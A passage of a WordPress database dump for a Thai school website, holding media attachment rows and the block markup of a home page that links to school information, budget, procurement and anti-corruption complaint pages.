(728,1,'2024-08-08 20:58:25','2024-08-08 13:58:25','','admss','','inherit','','closed','','admss','','','2024-08-08 20:58:25','2024-08-08 13:58:25','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp',0,'attachment','image/webp',0),
(729,1,'2024-08-08 20:58:59','2024-08-08 13:58:59','','2','','inherit','','closed','','2-2','','','2024-08-08 20:58:59','2024-08-08 13:58:59','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png',0,'attachment','image/png',0),
(730,1,'2024-08-08 20:59:50','2024-08-08 13:59:50','','5','','inherit','','closed','','5','','','2024-08-08 20:59:50','2024-08-08 13:59:50','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png',0,'attachment','image/png',0),
(731,1,'2024-08-08 21:01:05','2024-08-08 14:01:05','','6','','inherit','','closed','','6','','','2024-08-08 21:01:05','2024-08-08 14:01:05','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png',0,'attachment','image/png',0),
(732,1,'2024-08-08 21:01:13','2024-08-08 14:01:13','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- 